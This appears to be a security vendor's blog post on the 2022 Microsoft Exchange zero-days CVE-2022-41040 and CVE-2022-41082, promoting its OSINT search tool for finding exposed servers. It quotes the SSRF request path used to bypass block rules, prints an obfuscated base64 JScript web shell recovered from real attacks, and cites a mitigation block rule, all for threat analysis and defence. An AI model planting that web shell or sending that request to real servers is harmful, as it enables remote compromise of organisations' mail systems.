On September 30, 2022, Microsoft announced security updates for two zero-day vulnerabilities affecting Microsoft Exchange Server 2013, 2016, and 2019.
This article covers how to use the security OSINT tool to find servers with these vulnerabilities and a case study of an exploitable server. Two vulnerabilities have been discovered: CVE-2022-41082 and CVE-2022-41040. If a user has authenticated access rights to the Exchange Server that they want to attack, they can use both CVEs and launch a Remote Code Execution (RCE) attack on the server.
How Hackers Exploit Microsoft Exchange Zero-day Vulnerabilities
Hackers use the CVE-2022-41040 (CVSSv3 score 8.8) to escalate privileges in a Server-Side Request Forgery (SSRF) attack. Then, they execute a remote code execution (RCE) attack using CVE-2022-41082 (CVSSv3 score 8.8). After compromising the Exchange Server, Active Directory and data are leaked through installed malicious apps.
Hackers often target exposed and vulnerable Exchange servers. They then send an HTTP requtest ‘autodiscover/autodiscover.json?@evil.com/<Exchange-backend-endpoint>&Email=autodiscover/autodiscover.json%3f@evil.com’ through which they can bypass Microsoft recommended block rules. Once the server becomes accessible, a vulnerable Exchange backend component allows for RCE conditions.
Image Source : Microsoft Security, Analyzing attacks using the Exchange vulnerabilities CVE-2022-41040 and CVE-2022-41082
GTSC, a Vietnamese cybersecurity company, confirmed that the SSRF attack using CVE-2022-41040 occurred where an obfuscated web shell (a vulnerability that enables a web server to be remotely accessed) was requested on the Exchange server. This hacker used a user agent and accessed Antsword (an open-source, cross-platform management tool based in China). The web shell showed that hackers used Windows code page 936, a program that used simplified Chinese characters. This leads us to believe that a group of Chinese hackers carried out the attack. Another notable point can be found in the RedirSuiteServiceProxy.aspx file (the regular file available on the Exchange server). The contents of the file changed to code found in the web shell file.
#Server Requested Webshell
<%@Page Language="Jscript"%>
<%eval(System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('NTcyM'+'jk3O3'+'ZhciB'+'zYWZl'+''+'P'+'S'+char(837-763)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('MQ=='))+char(51450/525)+''+''+char(0640-0462)+char(0x8c28/0x1cc)+char(0212100/01250)+System.Text.Encoding.GetEncoding(936).GetString(System.Convert.FromBase64String('Wg=='))+'m'+''+'UiO2V'+'2YWwo'+'UmVxd'+'WVzdC'+'5JdGV'+'tWydF'+'WjBXS'+'WFtRG'+'Z6bU8'+'xajhk'+'J10sI'+'HNhZm'+'UpOzE'+'3MTY4'+'OTE7'+'')));%>Detect Exploitable Microsoft Exchange Servers Using OSINT Tools
Users can search Exchange servers with Exchange zero-day vulnerabilities using Criminal IP (https://www.criminalip.io). Use the cve_id filter and search for CVE-2022-41082 vulnerabilities. Searching for this vulnerability will yield 91,807 IP addresses hosting vulnerable Exchange servers.
[Criminal IP Search 101 – Is your MS Exchange Server Safe?]
Port statistics show that most IP addresses with Microsoft Exchange zero-day vulnerabilities usually have both 80/443 ports exposed. Other open ports are often variations of %443, such as 8443, 4433, etc.
Furthermore, we can see that some IP addresses are still operating in a vulnerable state with weak certificates.
Most IP addresses found with Criminal IP shows to have vulnerable ports 80 and 443. The Inbound Score is also deemed critical, and this tags these IP addresses as malicious. As seen below, the IP address intelligence report states that there are a total of 89 vulnerabilities exposed, with issues other than CVE-2022-41082, CVE-2022-41040. Furthermore, this IP address is a Hosting IP, which means that if a hacker increases their authorization through CVE-2022-41040, they can penetrate the internal network and leak further data from the server.
How Companies and Organizations Address Microsoft Exchange Zero-day Vulnerabilities
Microsoft recommends users to add *autodiscover\.json.*Powershell.* block rules to IIS Manager → Default Web Site → URL Rewrite → Actions in order to block known hacker attack patterns, and recommend disabling remote PowerShell access.
However, as with all zero-day vulnerabilities, it is very difficult to determine how these new vulnerabilities can affect the server. Usually, security personnel in corporations use vulnerability scanners to determine which vulnerability to take action on when these zero-day issues occur. However, it is difficult to scan all servers in operations, and it is also difficult to take quick action when an attack takes place.
Using the Security OSINT tool, you can quickly find vulnerable assets with Microsoft Exchange zero-day vulnerabilities. In addition, it is possible to effectively manage the attack surface by scanning for vulnerabilities, including neglected assets that are not identified internally and ports opened by mistake. Therefore, to quickly check whether there is a Microsoft Exchange zero-day vulnerability threat, search the IP address using Criminal IP, a Security OSINT tool, and check whether CVEs are mapped.
Check out this analysis article about the Zero-day vulnerability exploits found in June 2022 on Atlassian’s Confluence server.
Source : Criminal IP (https://www.criminalip.io)
[…] Check out our article from last month that discusses how to detect and analyze exposed servers by MS Exchange Zero-Day Vulnerability. […]
[…] Check out our article on detecting Microsoft Exchange zero-day vulnerabilities with the security OSINT tool. […]
[…] Related Article(s): https://blog.criminalip.io/2022/10/14/ms-exchange-zero-day-vulnerability/ […]